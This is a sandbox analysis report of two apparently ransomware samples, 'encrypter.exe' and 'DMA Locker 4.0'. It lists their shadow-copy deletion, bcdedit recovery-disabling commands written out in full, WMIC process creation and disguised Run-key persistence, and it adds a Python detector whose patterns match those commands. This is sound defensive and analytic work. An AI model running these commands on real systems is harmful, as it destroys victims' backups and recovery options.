MD5 b0304db30d33117ec0b5c29e6318e28f
SHA1 c1207d480e3fef671d2e4ca57a8bc5bd4deac7ac
SHA256 5e9c0c9ace2407ef793d68fbb8a46cca09c499a0a74309f397a2ecf15770c97b
SHA512 2976df7c9cb91770d4f652e78b3a3fca5f8729b942ccc82e1b0d7342333d5b635e417c440d4ada349001e90cd511e13779c7f25efa65773fe323853acd01c734

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20240903-en

Max time kernel

361s

Max time network

362s

Command Line

"C:\Users\Admin\AppData\Local\Temp\encrypter.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\encrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege; name not resolved by the sandbox) N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 (LUID 34 = SeTimeZonePrivilege; name not resolved by the sandbox) N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 (LUID 35 = SeCreateSymbolicLinkPrivilege; name not resolved by the sandbox) N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege; name not resolved by the sandbox) N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 (LUID 34 = SeTimeZonePrivilege; name not resolved by the sandbox) N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 (LUID 35 = SeCreateSymbolicLinkPrivilege; name not resolved by the sandbox) N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\encrypter.exe

"C:\Users\Admin\AppData\Local\Temp\encrypter.exe"

C:\Windows\SysWOW64\wbem\WMIC.exe

"C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
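Two things about the behavioral24 process list are worth encoding in detection. First, the three recovery-inhibiting commands (vssadmin delete shadows, bcdedit recoveryenabled no, bcdedit bootstatuspolicy ignoreallfailures) travel inside one cmd /c line that was itself passed to WMIC process call create, so a rule that only looks at leaf processes sees three unrelated events while a rule that splits the chained command line sees the whole intent at once. Second, WMIC's process call create makes WmiPrvSE.exe the parent of the new cmd.exe, which is why the "unexpected child process" signature fired and why a lineage rule keyed on encrypter.exe would miss it. (The WMIC image path is SysWOW64 while the command line says System32 because the 32-bit sample's call went through WOW64 file system redirection.) The Python below is an added example written for this report, not sandbox output; it also understands the per-volume /For=X: form that the behavioral11 sample further down this page uses. PID 2352 for encrypter.exe is taken from the report's memory dump names; all other PIDs and parent links are made up.

```python
import ntpath
import re

# Process-creation events modelled on the behavioral24 process list. Image
# paths and command lines are the report's; PID 2352 for encrypter.exe comes
# from the report's memory dump names, every other PID and parent link is
# made up (constructed data).
SAMPLE_EVENTS = [
    {"pid": 2352, "ppid": 1100, "image": r"C:\Users\Admin\AppData\Local\Temp\encrypter.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\encrypter.exe"'},
    {"pid": 2400, "ppid": 2352, "image": r"C:\Windows\SysWOW64\wbem\WMIC.exe",
     "cmdline": r'"C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c '
                r'vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} '
                r'recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"'},
    {"pid": 620, "ppid": 580, "image": r"C:\Windows\system32\wbem\wmiprvse.exe",
     "cmdline": r"C:\Windows\system32\wbem\wmiprvse.exe"},
    {"pid": 2456, "ppid": 620, "image": r"C:\Windows\system32\cmd.exe",  # parent is WmiPrvSE, not encrypter
     "cmdline": r"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} "
                r"recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"},
    {"pid": 2480, "ppid": 2456, "image": r"C:\Windows\system32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"pid": 2512, "ppid": 2456, "image": r"C:\Windows\system32\bcdedit.exe",
     "cmdline": "bcdedit.exe /set {default} recoveryenabled no"},
    {"pid": 2540, "ppid": 2456, "image": r"C:\Windows\system32\bcdedit.exe",
     "cmdline": "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"},
]

VSS_DELETE_RE = re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b(?P<args>.*)", re.I)
VSS_FOR_RE = re.compile(r"/for=(?P<vol>[a-z]:)", re.I)
BCDEDIT_RE = re.compile(
    r'\bbcdedit(?:\.exe)?\s+/set\s+(?:\{[^}]+\}\s+)?(?P<opt>recoveryenabled|bootstatuspolicy)\s+(?P<val>[^\s"]+)',
    re.I)
WMIC_CREATE_RE = re.compile(r"\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)
CHAIN_SPLIT_RE = re.compile(r"\s*(?:&&|\|\||&)\s*")   # cmd.exe command separators
RECOVERY_KILLERS = {("recoveryenabled", "no"), ("bootstatuspolicy", "ignoreallfailures")}


def classify_cmdline(cmdline):
    """Map one command line to the recovery-inhibition techniques it carries.

    A `cmd /c a & b & c` line is split on the separators first, so the whole
    chain is attributed to the line that carried it even when the child
    processes were never logged.
    """
    tags = []
    for part in CHAIN_SPLIT_RE.split(cmdline):
        m = VSS_DELETE_RE.search(part)
        if m:
            vol = VSS_FOR_RE.search(m.group("args"))
            tags.append(("vss_delete_shadows", vol.group("vol").upper() if vol else "ALL"))
        for m in BCDEDIT_RE.finditer(part):
            opt, val = m.group("opt").lower(), m.group("val").lower()
            if (opt, val) in RECOVERY_KILLERS:
                tags.append(("bcdedit_disable_recovery", f"{opt}={val}"))
    if WMIC_CREATE_RE.search(cmdline):
        tags.append(("wmic_process_create", "child is parented by WmiPrvSE.exe"))
    return tags


def unexpected_parent(child_image, parent_image):
    """True when a shell is started by a parent that should never launch one."""
    return (ntpath.basename(child_image).lower() in {"cmd.exe", "powershell.exe"}
            and ntpath.basename(parent_image).lower() in {"wmiprvse.exe"})


def analyze(events):
    """Return {'findings': [(pid, tag, detail)], 'verdict': str} for a batch of events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent and unexpected_parent(e["image"], parent["image"]):
            findings.append((e["pid"], "unexpected_parent", ntpath.basename(parent["image"])))
        for tag, detail in classify_cmdline(e["cmdline"]):
            findings.append((e["pid"], tag, detail))
    tags = {tag for _, tag, _ in findings}
    if {"vss_delete_shadows", "bcdedit_disable_recovery"} <= tags:
        verdict = "ransomware_prep"          # backups and boot recovery both removed
    elif tags:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"findings": findings, "verdict": verdict}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for pid, tag, detail in result["findings"]:
        print(f"{pid:6} {tag:26} {detail}")
    print("verdict:", result["verdict"])
```

The parent list in unexpected_parent is deliberately short and grounded in what this report shows; extend it with the Office and script-host parents your own telemetry justifies. Splitting on cmd.exe separators is what lets a single WMIC or cmd /c record carry the full verdict when the leaf processes are missing from the log.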

Network

N/A

Files

memory/2352-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2352-2-0x0000000000400000-0x000000000040A000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240903-en

Max time kernel

593s

Max time network

595s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\ProgramData\\select.bat" C:\ProgramData\svchosd.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Firewall = "C:\\ProgramData\\svchosd.exe" C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\ProgramData\\select.bat" C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Firewall = "C:\\ProgramData\\svchosd.exe" C:\ProgramData\svchosd.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\V: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\M: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\N: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\O: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\P: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\Y: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\P: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\I: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\S: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\T: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\L: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\R: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\W: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\N: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\R: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\A: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\U: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\K: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\M: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\S: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\J: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\K: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\L: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\J: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\Y: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\O: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\V: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\X: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\B: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\I: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\U: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\B: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\W: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\A: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\X: C:\WINDOWS\system32\vssadmin.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\svchosd.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1892 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 892 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 892 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 892 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1820 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1820 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2716 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2716 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2444 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2444 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2924 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2924 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1916 wrote to memory of 608 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1916 wrote to memory of 608 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1916 wrote to memory of 608 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1236 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1236 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 2744 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2744 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2744 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1716 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1716 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1716 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware
